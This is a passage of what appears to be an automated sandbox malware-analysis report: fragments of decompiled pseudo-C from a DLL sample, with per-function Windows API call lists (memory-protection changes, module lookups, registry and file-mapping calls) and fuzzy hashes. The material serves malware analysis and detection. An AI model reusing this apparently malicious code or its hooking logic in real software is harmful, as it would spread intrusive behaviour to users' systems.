                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E01C15ED7(_t101,  &_v428, _a8, _t96 - _t81);
                					E01C15ED7(_t79,  &_v156, _a12, _t97);
                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                					_t66 = E01C1367D(_t101, 0x1c1a188);
                					_t103 = _t101 - _t79;
                					_a8 = _t103;
                					if(_t103 < 0) {
                						L17:
                						E01C1367D(_a16, _a4);
                						E01C1635B(_t79,  &_v428, _a4, _t97);
                						memset( &_v428, 0, 0x10c);
                						_t55 = memset( &_v156, 0, 0x84);
                						goto L18;
                					}
                					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                					do {
                						if(_v8 != 0xffffffff) {
                							_push(1);
                							_push(0);
                							_push(0);
                							_push( *_t99);
                							L01C1807C();
                							_t74 = _t66 +  *(_t99 - 4);
                							asm("adc edx, esi");
                							_push(0);
                							_push(_v8 + 1);
                							_push(_t92);
                							_push(_t74);
                							L01C18076();
                							if(_t92 > 0 || _t74 > 0xffffffff) {
                								_t74 = _t74 | 0xffffffff;
                								_v16 = _v16 & 0x00000000;
                							}
                						} else {
                							_t74 =  *_t99;
                						}
                						_t106 = _t107 + _a8 * 4 - 0x1a8;
                						_a12 = _t74;
                						_t76 = E01C165C1(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                						while(1) {
                							 *_t99 =  *_t99 - _t76;
                							if( *_t99 != 0) {
                								goto L14;
                							}
                							L13:
                							_t92 =  &_v156;
                							if(E01C11D9B(_t79, _t92, _t106) < 0) {
                								break;
                							}
                							L14:
                							_a12 = _a12 + 1;
                							_t76 = E01C153CD(_t79,  &_v156, _t106, _t106);
                							 *_t99 =  *_t99 - _t76;
                							if( *_t99 != 0) {
                								goto L14;
                							}
                							goto L13;
                						}
                						_a8 = _a8 - 1;
                						_t66 = _a12;
                						_t99 = _t99 - 4;
                						 *(0x1c1a188 + _a8 * 4) = _t66;
                					} while (_a8 >= 0);
                					_t97 = _v12;
                					goto L17;
                				}
                				while(_t81 < _t96) {
                					_t81 = _t81 + 1;
                					_t56 = _t56 >> 1;
                					if(_t56 != 0) {
                						continue;
                					}
                					goto L4;
                				}
                				goto L4;
                			}

                APIs
                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 01C15990
                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 01C159A6
                • memset.NTDLL ref: 01C15A4F
                • memset.NTDLL ref: 01C15A65
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: memset$_allmul_aulldiv
                • String ID:
                • API String ID: 3041852380-0
                • Opcode ID: b7bf7b54d5ee7539941a6460b6c16c4a03cd3c9c8c0b7f051229a3ff18cbf98a
                • Instruction ID: 1b56bc61e202d44dc299568dbba782d7b9e8d0244221a83333026437448edd87
                • Opcode Fuzzy Hash: b7bf7b54d5ee7539941a6460b6c16c4a03cd3c9c8c0b7f051229a3ff18cbf98a
                • Instruction Fuzzy Hash: 2241D332A4021AEFDF109F68CC80BEE7765EF97720F104569B909A7284DB70DE45EB81
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 046CA71A
                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 046CA730
                • memset.NTDLL ref: 046CA7D9
                • memset.NTDLL ref: 046CA7EF
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memset$_allmul_aulldiv
                • String ID:
                • API String ID: 3041852380-0
                • Opcode ID: d6519d2f77efdca02007d3192b903978d4c5f135882cba8783bbb0b0eacceda8
                • Instruction ID: 38439f9531ba096dd5f82857f36c5ad9365e513218d9c16d96fe2bac7fd5a528
                • Opcode Fuzzy Hash: d6519d2f77efdca02007d3192b903978d4c5f135882cba8783bbb0b0eacceda8
                • Instruction Fuzzy Hash: 9B418F31A01219ABEB10DFA9CC84BFE77B5EF45314F00456DA959A7280FB70BE448B91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WaitForSingleObject.KERNEL32(00000000), ref: 046E592F
                • GetLastError.KERNEL32 ref: 046E594F
                  • Part of subcall function 046C2A41: wcstombs.NTDLL ref: 046C2AFF
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLastObjectSingleWaitwcstombs
                • String ID:
                • API String ID: 2344289193-0
                • Opcode ID: 18d56c2bf5a6313d5b09104377f988868cddd9536895862cd169c9fb78c6ea86
                • Instruction ID: fed9b1924e75b7b4cad32c72e7f31908e5fd5b9831545e9f5eedbd38e3c649a0
                • Opcode Fuzzy Hash: 18d56c2bf5a6313d5b09104377f988868cddd9536895862cd169c9fb78c6ea86
                • Instruction Fuzzy Hash: 11413670901259FFDF109FE6C8889FEBBF9EB14358B10446AE602E7250F734AA41DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • StrRChrA.SHLWAPI(?,00000000,00000023,?), ref: 046D0095
                • StrChrA.SHLWAPI(?,0000005C), ref: 046D00BC
                • lstrcpyn.KERNEL32(00000005,?,00000001,00000001), ref: 046D00E2
                • lstrcpy.KERNEL32(?,?), ref: 046D0186
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrcpylstrcpyn
                • String ID:
                • API String ID: 4154805583-0
                • Opcode ID: 1da68b088e3f6e454c439b965ab96059a290d7560518e9de5a9c9f98df2a0437
                • Instruction ID: e2327593759d76808536d74433be93b69251e054b4bb1787b04a18b08437277f
                • Opcode Fuzzy Hash: 1da68b088e3f6e454c439b965ab96059a290d7560518e9de5a9c9f98df2a0437
                • Instruction Fuzzy Hash: EF416C72900219BFDB119FA5CD84DEEBBFCEB09354F0480A6E901E7251E774EA44CB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: _strupr
                • String ID:
                • API String ID: 3408778250-0
                • Opcode ID: a1d3c1e047fe672a63fef4d0fe2ccf3fd8e4c8597280a9f550386595a5ef7945
                • Instruction ID: ce59cc4d48833edfe017393c8777945769bfe56c0cb1880508c138ff18c76d2c
                • Opcode Fuzzy Hash: a1d3c1e047fe672a63fef4d0fe2ccf3fd8e4c8597280a9f550386595a5ef7945
                • Instruction Fuzzy Hash: CB418671D0020A9EEB21EF69C884AFEB7F8EF54349F504825E825D6250F734F945CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C7554: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,046CCB3C,00000000,00000000,74E48170,00000008,0000EA60,00000000,?,?,046C567E), ref: 046C7560
                  • Part of subcall function 046C7554: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,046CCB3C,00000000,00000000,74E48170,00000008,0000EA60,00000000), ref: 046C75BE
                  • Part of subcall function 046C7554: lstrcpy.KERNEL32(00000000,74E48170), ref: 046C75CE
                • lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 046C63C0
                • wsprintfA.USER32 ref: 046C63F0
                • GetLastError.KERNEL32 ref: 046C6465
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
                • String ID: `
                • API String ID: 324226357-1850852036
                • Opcode ID: a6c3efdd9e2ccaab303c35560ec6ba1bf89c43d9671c7a95d40dd95a7c40470f
                • Instruction ID: b8c7b8b9d09fb8a413ed00caf3fc5889a576b7f8bd2bf1fdc4f3ea510ed9e7bc
                • Opcode Fuzzy Hash: a6c3efdd9e2ccaab303c35560ec6ba1bf89c43d9671c7a95d40dd95a7c40470f
                • Instruction Fuzzy Hash: 3B31A07150030AAFDB11EF65DC84AAA7BE9EF54355F10C02EF91596250FB70F9148BA8
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046D17C3: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000), ref: 046D17D1
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046DEE23
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 046DEE72
                  • Part of subcall function 046E36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,046E4FFC), ref: 046E373F
                  • Part of subcall function 046E36FE: GetLastError.KERNEL32 ref: 046E3749
                  • Part of subcall function 046E36FE: WaitForSingleObject.KERNEL32(000000C8), ref: 046E376E
                  • Part of subcall function 046E36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 046E378F
                  • Part of subcall function 046E36FE: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 046E37B7
                  • Part of subcall function 046E36FE: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 046E37CC
                  • Part of subcall function 046E36FE: SetEndOfFile.KERNEL32(00000006), ref: 046E37D9
                  • Part of subcall function 046E36FE: CloseHandle.KERNEL32(00000006), ref: 046E37F1
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,?,?,046D6D4E,?,?,?,?,?,?), ref: 046DEEA7
                • HeapFree.KERNEL32(00000000,?,?,?,?,046D6D4E,?,?,?,?,?,?,00000000,?,00000000), ref: 046DEEB7
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                • String ID:
                • API String ID: 4200334623-0
                • Opcode ID: 9354580de3c45a31b366cc0088c53892cb505e7fb3257c268eaadb7d6f1180a2
                • Instruction ID: 5c3c939d7b49bfdc2b22468072a5eda8523feaed18b00e0d75bf30dcd0685173
                • Opcode Fuzzy Hash: 9354580de3c45a31b366cc0088c53892cb505e7fb3257c268eaadb7d6f1180a2
                • Instruction Fuzzy Hash: 30311876910119FFEB10DFA5DC88CAABBBEFB48354B100469F504EB250E772AE51DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • TlsGetValue.KERNEL32(?), ref: 046D6482
                • SetEvent.KERNEL32(?), ref: 046D64CC
                • TlsSetValue.KERNEL32(00000001), ref: 046D6506
                • TlsSetValue.KERNEL32(00000000), ref: 046D6522
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Value$Event
                • String ID:
                • API String ID: 3803239005-0
                • Opcode ID: 65f7520c3f9cff51acecf0f9087912d8c423aca5171033441389e5ab1cd169c0
                • Instruction ID: c9453fa036ebd832cee86ef17a55f4acc5739d491c292cabd07ee30917327ec5
                • Opcode Fuzzy Hash: 65f7520c3f9cff51acecf0f9087912d8c423aca5171033441389e5ab1cd169c0
                • Instruction Fuzzy Hash: 64219031A00244AFDB319F5ADE849AA7BA6FF55350F104529F502DB660F372FC91DB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 046C86CF
                • memcpy.NTDLL(00000018,?,?), ref: 046C86F8
                • RegisterWaitForSingleObject.KERNEL32(00000010,?,046DDFF1,00000000,000000FF,00000008), ref: 046C8737
                • HeapFree.KERNEL32(00000000,00000000), ref: 046C874A
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                • String ID:
                • API String ID: 2780211928-0
                • Opcode ID: f0d0830e9b6040055ff705310841c050b2583b24dc1bfb8a77a49e34e7d0ff3a
                • Instruction ID: 2deb33b4ec90ca77251a4064989f42390fce6647263b1152a941bf4dfb78222a
                • Opcode Fuzzy Hash: f0d0830e9b6040055ff705310841c050b2583b24dc1bfb8a77a49e34e7d0ff3a
                • Instruction Fuzzy Hash: C0316170240306AFEB20EF16DC84BAA7BE9FF54320F104529F915D7290F775E9159BA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C215D: memcpy.NTDLL(00000000,00000110,?,?,?,?,?,046C1089,?,?,?), ref: 046C2193
                  • Part of subcall function 046C215D: memset.NTDLL ref: 046C2209
                  • Part of subcall function 046C215D: memset.NTDLL ref: 046C221D
                • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 046C10C4
                • lstrcmpi.KERNEL32(00000000,?), ref: 046C10EB
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 046C1130
                • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 046C1141
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                • String ID:
                • API String ID: 1065503980-0
                • Opcode ID: 5c0a3144c97eedf2aa217b5467c446237f53a6dc9de51885eb3646267d3b063e
                • Instruction ID: 5cfe59488aa761df0051fd428a4ad0a156524072b3d83b3a3a0db0184e41b6f3
                • Opcode Fuzzy Hash: 5c0a3144c97eedf2aa217b5467c446237f53a6dc9de51885eb3646267d3b063e
                • Instruction Fuzzy Hash: 73216D35A00209FFEF10AFA1DC44EAE7BB9EB15258F004068E904AB651F739AE55DF60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E01C131C2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                				intOrPtr _v8;
                				void* _v12;
                				void* _v16;
                				intOrPtr _t26;
                				intOrPtr* _t28;
                				intOrPtr _t31;
                				intOrPtr* _t32;
                				void* _t39;
                				int _t46;
                				intOrPtr* _t47;
                				int _t48;
                
                				_t47 = __eax;
                				_push( &_v12);
                				_push(__eax);
                				_t39 = 0;
                				_t46 = 0;
                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                				_v8 = _t26;
                				if(_t26 < 0) {
                					L13:
                					return _v8;
                				}
                				if(_v12 == 0) {
                					Sleep(0xc8);
                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                				}
                				if(_v8 >= _t39) {
                					_t28 = _v12;
                					if(_t28 != 0) {
                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                						_v8 = _t31;
                						if(_t31 >= 0) {
                							_t46 = lstrlenW(_v16);
                							if(_t46 != 0) {
                								_t46 = _t46 + 1;
                								_t48 = _t46 + _t46;
                								_t39 = E01C12114(_t48);
                								if(_t39 == 0) {
                									_v8 = 0x8007000e;
                								} else {
                									memcpy(_t39, _v16, _t48);
                								}
                								__imp__#6(_v16);
                							}
                						}
                						_t32 = _v12;
                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                					}
                					 *_a4 = _t39;
                					 *_a8 = _t46 + _t46;
                				}
                				goto L13;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: FreeSleepStringlstrlenmemcpy
                • String ID:
                • API String ID: 1198164300-0
                • Opcode ID: 88a8cbab5c9e32b3d7498e3f024e236788241d16754be22f2116404ddd1f4950
                • Instruction ID: 24f392cac05e16bf8131c64c4cf2557a7b105e36bead5b82b95ad74343fcf08c
                • Opcode Fuzzy Hash: 88a8cbab5c9e32b3d7498e3f024e236788241d16754be22f2116404ddd1f4950
                • Instruction Fuzzy Hash: E6217475A40249EFDB10EFA8C884DDEBBB8FF4A314B104169E905E7215D730EB01DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 046D0C9A
                • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 046D0CDE
                • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 046D0D21
                • CloseHandle.KERNEL32(?,?,?,?,?), ref: 046D0D44
                  • Part of subcall function 046E2449: GetTickCount.KERNEL32 ref: 046E2459
                  • Part of subcall function 046E2449: CreateFileW.KERNEL32(046DA7DD,80000000,00000003,046EE268,00000003,00000000,00000000,?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E2476
                  • Part of subcall function 046E2449: GetFileSize.KERNEL32(046DA7DD,00000000,?,00000001,?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E24A9
                  • Part of subcall function 046E2449: CreateFileMappingA.KERNEL32(046DA7DD,046EE268,00000002,00000000,00000000,046DA7DD), ref: 046E24BD
                  • Part of subcall function 046E2449: lstrlen.KERNEL32(046DA7DD,?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E24D9
                  • Part of subcall function 046E2449: lstrcpy.KERNEL32(?,046DA7DD), ref: 046E24E9
                  • Part of subcall function 046E2449: HeapFree.KERNEL32(00000000,046DA7DD,?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E2504
                  • Part of subcall function 046E2449: CloseHandle.KERNEL32(046DA7DD,?,00000001,?,046DA7DD), ref: 046E2516
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                • String ID:
                • API String ID: 3239194699-0
                • Opcode ID: 90fdd075d78b6924f705fab77626c39815eb77b520a48f49ae66c4fa5519e311
                • Instruction ID: bb712292e16538d9c21f6b73b383e0bcd4d5cedcdbe129bf7ffa45023cc041c7
                • Opcode Fuzzy Hash: 90fdd075d78b6924f705fab77626c39815eb77b520a48f49ae66c4fa5519e311
                • Instruction Fuzzy Hash: 6F214F71900208EBDB21DF66DD44DEE7BB9EF58318F14052AF916972A0F731E945CB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 046DD10C
                • lstrlen.KERNEL32(00000000), ref: 046DD11C
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • strcpy.NTDLL ref: 046DD133
                • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 046DD13D
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeaplstrlenmemsetstrcpy
                • String ID:
                • API String ID: 528014985-0
                • Opcode ID: 3585c033ab12f50aacacf65d85c28beba05f823fb8c834a69daed8f9e7fd7185
                • Instruction ID: 12b1a36ff863dfedfcb6f4d43408e57c01a2593cca32d505f1af02a32f6e06b1
                • Opcode Fuzzy Hash: 3585c033ab12f50aacacf65d85c28beba05f823fb8c834a69daed8f9e7fd7185
                • Instruction Fuzzy Hash: F121A972900702AFE720BF24DC48A6A77F9EB58351F009419F9668B281FB78E8048B65
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046E5DF1
                • RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046E5E0C
                • GetLastError.KERNEL32(?,?,?), ref: 046E5E7A
                • GetLastError.KERNEL32(?,?,?), ref: 046E5E89
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalErrorLastSection$EnterLeave
                • String ID:
                • API String ID: 2124651672-0
                • Opcode ID: f1816d5277fa67521fedb1182139bd43cddab82406f0a3ed50683f449f4aa6d3
                • Instruction ID: 23213a30e12b056c723892227936c5132eed89a89d9bf396ecd2d8acf2de4907
                • Opcode Fuzzy Hash: f1816d5277fa67521fedb1182139bd43cddab82406f0a3ed50683f449f4aa6d3
                • Instruction Fuzzy Hash: C4214836901209EFCB119FAAD804AAEBBF8FF58714F048155F802E7250E735EE159BA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046CE9B0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,046DBCFE), ref: 046CE9D6
                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 046DBD39
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,046D6B93,?), ref: 046DBD4B
                • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,046D6B93,?), ref: 046DBD63
                • CloseHandle.KERNEL32(?,?,?,?,?,?,046D6B93,?), ref: 046DBD7E
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$CloseCreateHandleModuleNamePointerRead
                • String ID:
                • API String ID: 1352878660-0
                • Opcode ID: beb6d7c7c13645a1557beedfed1483d47f1fd2dd5dfb049384c11fd7c0ddda2d
                • Instruction ID: 4bce5bb81b0debb640c39d1b44bf1769c35892b3b814a2db9956ce607eb3255a
                • Opcode Fuzzy Hash: beb6d7c7c13645a1557beedfed1483d47f1fd2dd5dfb049384c11fd7c0ddda2d
                • Instruction Fuzzy Hash: 6B116371900118BBDF20AF65CC88EEF7E7DEF01B54F104115F502E6194E771AE40CAA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(8B000000,046CB526,?,046CB526,00000004), ref: 046D4DA4
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • lstrcpy.KERNEL32(00000000,8B000000), ref: 046D4DBB
                • StrChrA.SHLWAPI(00000000,0000002E,?,046CB526,00000004), ref: 046D4DC4
                • GetModuleHandleA.KERNEL32(00000000,?,046CB526,00000004), ref: 046D4DE2
                  • Part of subcall function 046D8CCE: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,8B000000,?,00000004,00000000,00000004,00000002,00000000,?), ref: 046D8DA5
                  • Part of subcall function 046D8CCE: VirtualProtect.KERNELBASE(046CB73B,00000004,00000002,00000002,?,00000004,00000000,00000004,00000002,00000000,?,00000000,00000000,046EA580,0000001C,046DBB7F), ref: 046D8DC0
                  • Part of subcall function 046D8CCE: RtlEnterCriticalSection.NTDLL(046EE480), ref: 046D8DE4
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                • String ID:
                • API String ID: 105881616-0
                • Opcode ID: 15a0cf2cec227a79ac15e086c740cb7f7e6f299f378d503ed3fdaa08cd3d5bf7
                • Instruction ID: 1f08ef20cc277e6a70dd36a3a8503f0f34f0b9bd3bf5e25fc30b23bdd1e33033
                • Opcode Fuzzy Hash: 15a0cf2cec227a79ac15e086c740cb7f7e6f299f378d503ed3fdaa08cd3d5bf7
                • Instruction Fuzzy Hash: 5E211874A00205EFDB20EF65C988AAEBBF9FF54304F108059E4559B350EBB4EE41DB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlenW.KERNEL32(?,00000000,74E48250,74E069A0,?,?,?,046CB28E,?,00000000,00000001), ref: 046E5B3E
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,046CB28E,?,00000000,00000001), ref: 046E5B60
                • lstrcpyW.KERNEL32(00000000,?), ref: 046E5B8C
                • lstrcatW.KERNEL32(00000000,?), ref: 046E5B9F
                  • Part of subcall function 046DE67F: strstr.NTDLL ref: 046DE757
                  • Part of subcall function 046DE67F: strstr.NTDLL ref: 046DE7AA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                • String ID:
                • API String ID: 3712611166-0
                • Opcode ID: ada5ce5fbca9a3494f71005588865cb928f5fcbed1e73742c2843a74569390f7
                • Instruction ID: 54ee430e9a2adcbfde263033a980a20b46351d35c899b38c6801cf6f8b1bd4ad
                • Opcode Fuzzy Hash: ada5ce5fbca9a3494f71005588865cb928f5fcbed1e73742c2843a74569390f7
                • Instruction Fuzzy Hash: 31110772501219FFDB11AFA6CC88DEF7BADEF04299B004468F9059B210E775EE41DBA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegOpenKeyA.ADVAPI32(80000001,00000008,00000008), ref: 046D6E15
                • RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,00000008,?,00000008), ref: 046D6E39
                • RegCloseKey.ADVAPI32(00000008,?,00000008), ref: 046D6E91
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,?,00000000,?,00000008), ref: 046D6E62
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: QueryValue$AllocateCloseHeapOpen
                • String ID:
                • API String ID: 453107315-0
                • Opcode ID: ec05cc34373de30e2d7ae3f9bc45ac103107ddce871ba38f0aa5f785adbfb34c
                • Instruction ID: d68a0a1fc802c63765713c399a32c16c96eb7792142aa3676da9f50d4820ddb1
                • Opcode Fuzzy Hash: ec05cc34373de30e2d7ae3f9bc45ac103107ddce871ba38f0aa5f785adbfb34c
                • Instruction Fuzzy Hash: F221EAB590010DFFDB119F95C9808EEBBBDEF94344F104556F801AA220E771AA55DB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E01C12A4E(unsigned int __eax, void* __ecx) {
                				void* _v8;
                				void* _v12;
                				signed int _t21;
                				signed short _t23;
                				char* _t27;
                				void* _t29;
                				void* _t30;
                				unsigned int _t33;
                				void* _t37;
                				unsigned int _t38;
                				void* _t41;
                				void* _t42;
                				int _t45;
                				void* _t46;
                
                				_t42 = __eax;                                  // input: NUL-terminated ANSI string
